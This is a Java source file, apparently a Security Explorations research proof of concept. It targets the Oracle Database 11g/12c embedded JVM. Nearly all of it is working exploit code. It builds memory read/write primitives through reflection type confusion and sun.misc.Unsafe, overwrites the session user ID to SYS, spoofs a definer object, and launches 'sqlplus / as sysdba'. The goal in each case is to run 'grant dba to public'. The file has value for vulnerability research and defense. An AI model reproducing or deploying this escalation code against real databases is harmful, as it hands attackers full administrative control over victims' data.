/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.reflect.*;
import java.security.*;
import java.util.*;
import java.net.*;
import java.io.*;
import java.sql.*;

public class DBE {
 public long v_l;
 public int v_i;
 public DBE v_h;
 public int dummy;

 private static Field f_l;
 private static Field f_i;
 private static Field f_h;
 private static DBE h;

 private static int addrsize=-1;

 private static Object theUnsafe;
 private static Method fieldOffset;
 private static Method putObject;
 private static Method getInt;
 private static Method putInt;

 public static final int DB_11G                    = 0;
 public static final int DB_12C                    = 1;

 public static final int DB_32bit                  = 0;
 public static final int DB_64bit                  = 1;

 public static final int OFF_DB_VER                = 0;
 public static final int OFF_DB_ARCH               = 1;
 public static final int OFF_JOM_ACTIVE_CLASS      = 2;
 public static final int OFF_JOM_ACTIVE_CLASS_PAIR = 3;
 public static final int OFF_EOIDSTKPAIR_HANDLE    = 4;
 public static final int OFF_JOE_OBJ_SLOTS         = 5;

 private static int jvm_offsets[][]={
  {DB_11G, DB_32bit, 0x08, 0x18, 0x08, 0x0c},
  {DB_11G, DB_64bit, 0x08, 0x28, 0x08, 0x10},
  {DB_12C, DB_64bit, 0x10, 0x30, 0x08, 0x10}
 };

 public static final String PRIVILEGED_SQL         = "grant dba to public";

 public static final int RUNAS_DBA                 = 1;
 public static final int RUNAS_DEFINER             = 2;
 public static final int RUNAS_DEFINER_NOPRIV      = 3;

 public static final long SYS_USERID               = 0L;
 public static final String SQLPLUS_AS_SYSDBA      = "sqlplus / as sysdba";

 private static String res;

 //dummy placeholders for spoofed oracle.aurora.rdbms.security.VersionedObject
 //they are required to dispatch get() method through our code
 private static Object sdp1() {return run_privileged();}
 private static Object sdp2() {return run_privileged();}
 private static Object sdp3() {return run_privileged();}
 private static Object sdp4() {return run_privileged();}
 private static Object sdp5() {return run_privileged();}
 private static Object sdp6() {return run_privileged();}
 private static Object sdp7() {return run_privileged();}
 private static Object sdp8() {return run_privileged();}
 private Object dp1() {return run_privileged();}
 private Object dp2() {return run_privileged();}
 private Object dp3() {return run_privileged();}
 private Object dp4() {return run_privileged();}
 private Object dp5() {return run_privileged();}
 private Object dp6() {return run_privileged();}
 private Object dp7() {return run_privileged();}
 private Object dp8() {return run_privileged();}

 public static Object run_privileged() {
  try {
   Class c=Class.forName("oracle.jdbc.OracleDriver");
   Object od=c.newInstance();

   Method m=c.getMethod("defaultConnection",new Class[0]);
   Connection conn = (Connection)m.invoke(od,new Object[0]);

   Statement s=conn.createStatement();
   ResultSet rset=s.executeQuery(PRIVILEGED_SQL);
   rset.close();
   s.close(); 
  } catch(Throwable t) {
  }

  return "HELLO DBA";
 }

 public static String main(String args[]) {
  String exp_clazz=args[0];
  String runas_type=args[1];
  String db_ver=args[2];

  return run(exp_clazz,runas_type,db_ver);
 }

 public static void log(String s) {
  res+=s+"\n";
 }

 public static long getaddr_64(Object o) {
  long val=-1;

  try {
   Class clazz=Class.forName("DBE");
   h=(DBE)clazz.newInstance();
   
   f_h=clazz.getField("v_h");
   f_l=clazz.getField("v_l");

   Field f_t_h=f_h.getClass().getDeclaredField("type");
   Field f_t_l=f_l.getClass().getDeclaredField("type");

   f_t_h.setAccessible(true);
   f_t_l.setAccessible(true);

   Class c_h=(Class)Class.forName("java.lang.Object");
   Class c_i=(Class)f_t_l.get(f_l);

   f_t_h.set(f_h,c_i);
   f_t_l.set(f_l,c_h);

   f_l.set(h,o);
   val=h.v_l;
  } catch(Throwable t) {
  }

  return val;
 }

 public static long readmem_64(long addr) {
  long val=-1;

  try {
   Class clazz=Class.forName("DBE");
   h=(DBE)clazz.newInstance();
   
   f_h=clazz.getField("v_h");
   f_l=clazz.getField("v_l");

   Field f_t_h=f_h.getClass().getDeclaredField("type");
   Field f_t_l=f_l.getClass().getDeclaredField("type");

   f_t_h.setAccessible(true);
   f_t_l.setAccessible(true);

   Class c_h=(Class)Class.forName("java.lang.Object");
   Class c_i=(Class)f_t_l.get(f_l);

   f_t_h.set(f_h,c_i);
   f_t_l.set(f_l,c_h);

   f_h.setLong(h,addr-16);
   val=h.v_h.v_l;
   f_h.setLong(h,0);
  } catch(Throwable t) {
  }

  return val;
 }

 public static void writemem_64(long addr,long val) {
  try {
   Class clazz=Class.forName("DBE");
   h=(DBE)clazz.newInstance();
   
   f_h=clazz.getField("v_h");
   f_l=clazz.getField("v_l");

   Field f_t_h=f_h.getClass().getDeclaredField("type");
   Field f_t_l=f_l.getClass().getDeclaredField("type");

   f_t_h.setAccessible(true);
   f_t_l.setAccessible(true);

   Class c_h=(Class)Class.forName("java.lang.Object");
   Class c_i=(Class)f_t_l.get(f_l);

   f_t_h.set(f_h,c_i);
   f_t_l.set(f_l,c_h);

   f_h.setLong(h,addr-16);
   h.v_h.v_l=val;
   f_h.setLong(h,0);
  } catch(Throwable t) {
  }
 }

 public static void initmem_32() {
  try {
   Class c=Class.forName("java.nio.Bits");
   Field f=c.getDeclaredField("unsafe");
   f.setAccessible(true);

   c=Class.forName("sun.misc.Unsafe");

   Class ctab[]=new Class[1];
   ctab[0]=Class.forName("java.lang.reflect.Field");

   fieldOffset=c.getMethod("fieldOffset",ctab);

   ctab=new Class[3];
   ctab[0]=Class.forName("java.lang.Object");
   ctab[1]=Long.TYPE;
   ctab[2]=Class.forName("java.lang.Object");

   putObject=c.getMethod("putObject",ctab);

   ctab=new Class[1];
   ctab[0]=Long.TYPE;

   getInt=c.getMethod("getInt",ctab);

   ctab=new Class[2];
   ctab[0]=Long.TYPE;
   ctab[1]=Integer.TYPE;

   putInt=c.getMethod("putInt",ctab);

   theUnsafe=f.get(null);
  } catch(Throwable t) {
  }
 }

 public static long getaddr_32(Object o) {
  long val=-1;

  if (theUnsafe==null) initmem_32();

  try {
   Class clazz=Class.forName("DBE");
   h=(DBE)clazz.newInstance();
   
   f_i=clazz.getField("v_i");

   Object args[]=new Object[1];
   args[0]=f_i;

   Object off=fieldOffset.invoke(theUnsafe,args);

   args=new Object[3];
   args[0]=h;
   args[1]=off;
   args[2]=o;

   putObject.invoke(theUnsafe,args);

   val=(long)h.v_i;
  } catch(Throwable t) {
  }

  return val;
 }

 public static long readmem_32(long addr) {
  long val=-1;

  if (theUnsafe==null) initmem_32();

  try {
   Object args[]=new Object[1];
   args[0]=new Long(addr);

   Integer ival=(Integer)getInt.invoke(theUnsafe,args);

   val=(long)ival.intValue();
  } catch(Throwable t) {
  }

  return val;
 }

 public static void writemem_32(long addr,long val) {
  if (theUnsafe==null) initmem_32();

  try {
   Object args[]=new Object[2];
   args[0]=new Long(addr);
   args[1]=new Integer((int)val);

   putInt.invoke(theUnsafe,args);
  } catch(Throwable t) {
  }
 }

 public static long getaddr(Object o) {
  long val=-1;

  switch(addr_size()) {
   case 4:
    val=getaddr_32(o);
    break;
   case 8:
    val=getaddr_64(o);
    break;
  }

  return val;
 }

 public static long readmem(long addr) {
  long val=-1;

  switch(addr_size()) {
   case 4:
    val=readmem_32(addr);
    break;
   case 8:
    val=readmem_64(addr);
    break;
  }

  return val;
 }

 public static void writemem(long addr,long val) {
  switch(addr_size()) {
   case 4:
    writemem_32(addr,val);
    break;
   case 8:
    writemem_64(addr,val);
    break;
  }
 }

 public static int addr_size() {
  if (addrsize>0) return addrsize;

  try {
   Class c=Class.forName("java.nio.Bits");
   Field f=c.getDeclaredField("unsafe");
   f.setAccessible(true);

   Object unsafe=f.get(null);

   c=Class.forName("sun.misc.Unsafe");

   Class ctab[]=new Class[1];
   ctab[0]=Class.forName("java.lang.reflect.Field");

   Method m=c.getMethod("fieldOffset",ctab);

   c=Class.forName("DBE");

   f=c.getField("dummy");

   Object args[]=new Object[1];
   args[0]=f;

   Integer ival=(Integer)m.invoke(unsafe,args);
   int off=ival.intValue();

   if (off==0x1c) addrsize=4;
    else addrsize=8;
  } catch(Throwable t) {
  }

  return addrsize;
 }

 public static long addr_align(long addr) {
  switch(addr_size()) {
   case 4:
    addr=addr&0x00000000fffffffcL;
    break;  
   case 8:
    addr=addr&0xfffffffffffffff8L;
    break;  
  }

  return addr;
 }

 private static void runas_dba(String cmd) {
  try {
   String cmdline=null;

   String sysname=System.getProperty("os.name").toLowerCase();

   if (sysname.startsWith("windows")) {
    cmdline=SQLPLUS_AS_SYSDBA;
   } else {
    String orahome=System.getenv("ORACLE_HOME");
    if (orahome!=null) {
     cmdline=orahome+"/bin/"+SQLPLUS_AS_SYSDBA;
    } else {
     cmdline=SQLPLUS_AS_SYSDBA;
    }
   }

   if (cmdline!=null) {
    Process p=Runtime.getRuntime().exec(cmdline);
    log("sqlplus: "+p);

    InputStream is=p.getInputStream();
    OutputStream os=p.getOutputStream();

    PrintWriter writer=new PrintWriter(os);
    writer.println(cmd+";");
    writer.println("quit");
    writer.flush();

    BufferedReader b=new BufferedReader(new InputStreamReader(is,"utf-8"));

    String line=b.readLine();

    while(line!=null) {
     log(line);
     line=b.readLine();
    }
   } 
  } catch(Throwable t) {
    log("exception: "+t);
  }
 }

 private static void setup_definer_internal(long addr,int offsets[]) {
  try {
   addr=readmem(addr+offsets[OFF_JOM_ACTIVE_CLASS]);
   addr=addr_align(addr);

   addr=readmem(addr+offsets[OFF_JOM_ACTIVE_CLASS_PAIR]);
   addr=addr_align(addr);

   if (addr!=0) {
    addr=readmem(addr+offsets[OFF_EOIDSTKPAIR_HANDLE]);

    //change uid values to 0 (SYS)
    long val=readmem(addr+0x00);
    val&=0xffffffff00000000L;
    val|=SYS_USERID;
    writemem(addr+0x00,val);
   }
 
  } catch(Throwable t) {
    log("exception: "+t);
  }
 }

 private static int[] get_offsets(int db_ver) {
  int arch_idx=(addr_size()/4)-1;

  for(int i=0;i<jvm_offsets.length;i++) {
   int offtab[]=jvm_offsets[i];
   if ((offtab[OFF_DB_VER]==db_ver)&&(offtab[OFF_DB_ARCH]==arch_idx)) return offtab;
  }

  return null;
 }

 private static void setup_definer(int db_ver,Object o) {
  int offsets[]=get_offsets(db_ver);
  long addr=-1;

  switch(db_ver) {
   case DB_11G:
    addr=getaddr(o);
    break;
   case DB_12C:
    addr=getaddr(o.getClass());
    break;
  }

  if (addr!=-1) {
   addr=addr_align(addr);
   setup_definer_internal(addr,offsets);
  }
 }

 private static void runas_sys_definer(int db_ver,String cmd) {
  try {
   DBE dbe=new DBE();

   setup_definer(db_ver,dbe);
   run_privileged();
  } catch(Throwable t) {
    log("exception: "+t);
  }
 }

 private static Object get_definer_object_11g() {
  Object dvo=null;

  try {
   Class c=Class.forName("oracle.aurora.rdbms.security.DefinersVersionedObject");

   Class ctab[]=new Class[2];
   ctab[0]=Class.forName("oracle.aurora.rdbms.Schema");
   ctab[1]=Class.forName("java.lang.String");

   Constructor con=c.getDeclaredConstructor(ctab);
   con.setAccessible(true);

   Object args[]=new Object[2];
   args[1]="dummy";

   dvo=con.newInstance(args);
  } catch(Throwable t) {
  }

  return dvo;
 }

 private static Object get_definer_object_12c() {
  Object dvo=null;

  try {
   Class c=Class.forName("oracle.aurora.rdbms.security.DefinersVersionedObject");

   Class ctab[]=new Class[1];
   ctab[0]=Class.forName("java.sql.Connection");

   Constructor con=c.getDeclaredConstructor(ctab);
   con.setAccessible(true);

   Object args[]=new Object[1];
   args[0]=null;

   dvo=con.newInstance(args);
  } catch(Throwable t) {
  }

  return dvo;
 }

 private static Object get_definer_object(int db_ver) {
  Object dvo=null;

  switch(db_ver) {
   case DB_11G:
    dvo=get_definer_object_11g();
    break;
   case DB_12C:
    dvo=get_definer_object_12c();
    break;
  }

  return dvo;
 }

 private static void runas_sys_definer_no_priv(int db_ver,String cmd) {
  try {
   int offsets[]=get_offsets(db_ver);

   DBE dbe=new DBE();

   Object dvo=get_definer_object(db_ver);
   Class c=dvo.getClass();

   Method mget=c.getDeclaredMethod("get",new Class[0]);
   mget.setAccessible(true);
   
//   setup_definer(db_ver,dvo);

   long dvo_addr=getaddr(dvo);
   dvo_addr=addr_align(dvo_addr);

   long dbe_addr=getaddr(dbe);

   writemem(dvo_addr+offsets[OFF_JOE_OBJ_SLOTS],dbe_addr);

   Object res=mget.invoke(dvo,new Object[0]);
  } catch(Throwable t) {
    log("exception: "+t);
  }
 }

 private static int process_dbver(String dbver) throws Exception {
  if (dbver.equals("11g")) return DB_11G;
   else
  if (dbver.equals("12c")) return DB_12C;
   else return -1;
 }

 private static int process_runastype(String runastype) {
  if (runastype.equals("runas_dba")) return RUNAS_DBA;
   else
  if (runastype.equals("runas_definer")) return RUNAS_DEFINER;
   else
  if (runastype.equals("runas_definer_nopriv")) return RUNAS_DEFINER_NOPRIV;
   else return -1;
 }

 public static String run(String exp_class,String runastype,String db_ver) {
  res="";

  try {
    SecurityManager org_sm=System.getSecurityManager();
    log("org_sm = "+org_sm);

    Class c=Class.forName(exp_class);
    Method run=c.getMethod("runpoc",new Class[0]);
    
    log("["+exp_class+" BEGIN]");
    String poc_log=(String)run.invoke(null,new Object[0]);
    log(poc_log);
    log("["+exp_class+" END]");

    SecurityManager sm=System.getSecurityManager();

    log("sm = "+sm);

    String sql=PRIVILEGED_SQL;

    int dbver_idx=process_dbver(db_ver);
    int RUNAS_TYPE=process_runastype(runastype);

    switch(RUNAS_TYPE) {
     case RUNAS_DBA:
      runas_dba(sql);
      break;
     case RUNAS_DEFINER:
      runas_sys_definer(dbver_idx,sql);
      break;
     case RUNAS_DEFINER_NOPRIV:
      runas_sys_definer_no_priv(dbver_idx,sql);
      break;
    }

    System.setSecurityManager(org_sm);
  } catch(Throwable t) {
   log("exception: "+t);
  }

  return res;
 }
}
